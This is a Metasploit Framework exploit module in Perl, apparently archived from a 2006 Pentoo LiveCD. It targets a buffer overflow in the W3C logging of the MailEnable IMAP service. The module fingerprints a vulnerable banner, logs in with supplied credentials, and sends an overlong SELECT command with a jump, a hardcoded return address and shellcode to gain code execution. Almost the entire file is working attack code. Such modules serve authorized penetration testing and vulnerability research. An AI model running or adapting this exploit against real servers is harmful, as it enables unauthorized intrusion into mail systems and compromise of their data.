home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / mailenable_imap_w3c.pm < prev    next >
Text File  |  2006-06-30  |  4KB  |  158 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::mailenable_imap_w3c;
  11. use strict;
  12. use base 'Msf::Exploit';
  13. use Msf::Socket::Tcp;
  14. use Pex::Text;
  15.  
  16. my $advanced = {
  17.   };
  18.  
  19. my $info = {
  20.     'Name'    => 'MailEnable IMAPD W3C Logging Buffer Overflow',
  21.     'Version'  => '$Revision: 1.1 $',
  22.     'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],
  23.     'Arch'    => [ 'x86' ],
  24.     'OS'      => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
  25.     'Priv'    => 1,
  26.     'AutoOpts'  =>
  27.       {
  28.         'EXITFUNC'  => 'thread',
  29.       },
  30.     'UserOpts'  =>
  31.       {
  32.         'RHOST' => [1, 'ADDR', 'The target address'],
  33.         'RPORT' => [1, 'PORT', 'The target port', 143],
  34.         'USER'  => [1, 'DATA', 'IMAP Username'],
  35.         'PASS'  => [1, 'DATA', 'IMAP Password'],
  36.  
  37.       },
  38.     'Payload' =>
  39.       {
  40.         'Prepend'   => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
  41.         'Space'     => 600,
  42.         'BadChars'  => "\x00\x0a\x0d\x20",
  43.         'Keys'      => ['+ws2ord'],
  44.       },
  45.     'Description'  => Pex::Text::Freeform(qq{
  46.         This module exploits a buffer overflow in the W3C logging
  47.     functionality of the MailEnable IMAPD service. Logging is not
  48.     enabled by default and this exploit requires a valid username
  49.     and password to exploit the flaw. MailEnable Professional version
  50.     1.6 and prior and MailEnable Enterprise version 1.1 and prior are
  51.     affected.    
  52. }),
  53.     'Refs'  =>
  54.       [
  55.         ['BID', 15006],
  56.       ],
  57.     'Targets' =>
  58.       [
  59.         ['MailEnable 1.54 Pro Universal', 0x1001c019], #MEAISP.DLL
  60.       ],
  61.     'Keys' => ['imap'],
  62.   };
  63.  
  64. sub new {
  65.     my $class = shift;
  66.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  67.  
  68.     return($self);
  69. }
  70.  
  71. sub Check {
  72.     my ($self) = @_;
  73.     my $target_host = $self->GetVar('RHOST');
  74.     my $target_port = $self->GetVar('RPORT');
  75.  
  76.     my $s = Msf::Socket::Tcp->new
  77.       (
  78.         'PeerAddr'  => $target_host,
  79.         'PeerPort'  => 25,
  80.         'LocalPort' => $self->GetVar('CPORT'),
  81.         'SSL'       => $self->GetVar('SSL'),
  82.       );
  83.  
  84.     if ($s->IsError) {
  85.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  86.         return $self->CheckCode('Connect');
  87.     }
  88.  
  89.     $s->Send("QUIT\r\n");
  90.     my $res = $s->Recv(-1, 20);
  91.     $s->Close();
  92.  
  93.     if ($res !~ /MailEnable Service, Version: 0-1\.54/) {
  94.         $self->PrintLine("[*] This server does not appear to be vulnerable.");
  95.         return $self->CheckCode('Safe');
  96.     }
  97.  
  98.     $self->PrintLine("[*] Vulnerable installation detected :-)");
  99.     return $self->CheckCode('Detected');
  100. }
  101.  
  102. sub Exploit {
  103.     my $self = shift;
  104.  
  105.     my $targetHost  = $self->GetVar('RHOST');
  106.     my $targetPort  = $self->GetVar('RPORT');
  107.     my $targetIndex = $self->GetVar('TARGET');
  108.     my $user        = $self->GetVar('USER');
  109.     my $pass        = $self->GetVar('PASS');
  110.     my $encodedPayload = $self->GetVar('EncodedPayload');
  111.     my $shellcode   = $encodedPayload->Payload;
  112.     my $target = $self->Targets->[$targetIndex];
  113.  
  114.     my $sock = Msf::Socket::Tcp->new(
  115.         'PeerAddr' => $targetHost,
  116.         'PeerPort' => $targetPort,
  117.       );
  118.     if($sock->IsError) {
  119.         $self->PrintLine('Error creating socket: ' . $sock->GetError);
  120.         return;
  121.     }
  122.  
  123.     my $resp = $sock->Recv(-1);
  124.     chomp($resp);
  125.     $self->PrintLine('[*] Got Banner: ' . $resp);
  126.  
  127.     my $sploit = "a01 LOGIN $user $pass\r\n";
  128.     $sock->Send($sploit);
  129.     my $resp = $sock->Recv(-1);
  130.     if($sock->IsError) {
  131.         $self->PrintLine('Socket error: ' . $sock->GetError);
  132.         return;
  133.     }
  134.     if($resp !~ /^a01 BAD LOGIN-/) {
  135.         $self->PrintLine('Login error: ' . $resp);
  136.         return;
  137.     }
  138.     $self->PrintLine('[*] Logged in, sending overflow');
  139.  
  140.     my $splat = Pex::Text::AlphaNumText(6196);
  141.     $sploit =
  142.       "a01 SELECT ". $splat.
  143.       "\xeb\x06".  pack('V', $target->[1]).
  144.       $shellcode. "\r\n";
  145.  
  146.     $sock->Send($sploit);
  147.  
  148.     my $resp = $sock->Recv(-1);
  149.     if(length($resp)) {
  150.         $self->PrintLine('[*] Got response, bad: ' . $resp);
  151.     }
  152.  
  153.     return;
  154.  
  155. }
  156.  
  157. 1;
  158.